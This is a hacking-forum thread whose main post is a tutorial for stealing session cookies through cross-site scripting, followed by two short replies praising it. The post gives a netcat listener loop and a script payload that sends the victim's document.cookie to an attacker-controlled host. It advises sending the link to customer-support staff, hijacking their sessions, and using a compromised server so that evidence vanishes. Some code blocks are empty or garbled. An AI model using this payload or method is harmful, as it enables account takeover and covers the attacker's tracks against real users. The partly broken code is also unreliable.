Results 1 to 3 of 3

Thread: Fast and easy XSS exploitation with netcat

  1. #1

    Fast and easy XSS exploitation with netcat

    If you don't want to set up a whole website just for your XSS-Cookie-Stealing-Script, you can simply do this little trick.
    This Tutorial is a part of an XSS exploitation series, because I have noticed that you guys have no f*cking idea how to properly exploit XSS vulnerabilities.

    What you need:

    A Website that is vulnerable to XSS
    A PC with netcat. preferrably Linux, but it also works on Windows
    Even better: Shell Access to some other Webserver
    Know how to port forward

    How to do it:

    1: Port Forwarding
    There are a bunch of tutorials on how to do this. Just forward any unreserved port to the PC where you want to set up your listener.
    2: Starting netcat.
    If you are on linux, I have a small script for you:
    PHP Code:
    while true; do { echo -'HTTP/1.1 200 OK\r\n'cat index.html; } | nc --p 1337 -q 1 done 
    This script will listen on port 1337 (use the port that you have forwarded) and serve anyone who tries to connect with the index.html which can be anything you want.
    I recommend having as the index.html some error page or something that redirects back, or anywhere else.
    3: Crafting the XSS vector
    You want something that redirects the user to your page and gives you some info. Implement this Script into the vulnerable page:
    PHP Code:
    however, sometimes the + character is being parsed into a space. but then you can use

    PHP Code:
    <script>var one="http://attackerip:port/index.html?cookie=";var two=document.cookie;document.location=one.concat(two);</script> 
    and there you go.
    4: Using that:
    You won't want to have netcat up for a long time, but for a short cookie grab. Thus, for exaple while chatting with customer support etc, you can setup the listener, and send them your crafted XSS link. They Click it, and you get a HTTP GET request on your netcat screen, which shows the cookie and some other info. When you have that shit, you can close your netcat listener, and use their cookie.
    The only trace is the IP, but you can avoid this by doing this whole thing on a shelled webserver.
    5: Real Laif example:
    Now I will show you a real life examle of this method;
    I used this xss vuln:
    PHP Code: 
    because the + was parsed I used the following syntax as the attack vector
    PHP Code:<script>var one="";var two=document.cookie;document.location=one.concat(two);</script>&x=0&y=0 
    Having the vector crafted, I setup my server, and ran the vector in the browser on my other PC. on the server(my raspberrypi ) this is what you see:

    ( alil bit of censorship so you dont get too much info..)
    as you can see, I have the cookie now, and some information about the victim.
    When I am done, I can simmply close the netcat listener and the evidence is gone.
    Use the cookie to login and you are fine.

    No webhosting service needed, evidence vanishes, and you get everything in no time

    That's it for today, cheers!

  2. #2
    This post is like a rainbow *Beautiful*

    Anyway great post!

  3. #3
    Quote Originally Posted by Optimus Prime View Post
    This post is like a rainbow *Beautiful*

    Anyway great post!
    Thanks Buddy!


Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts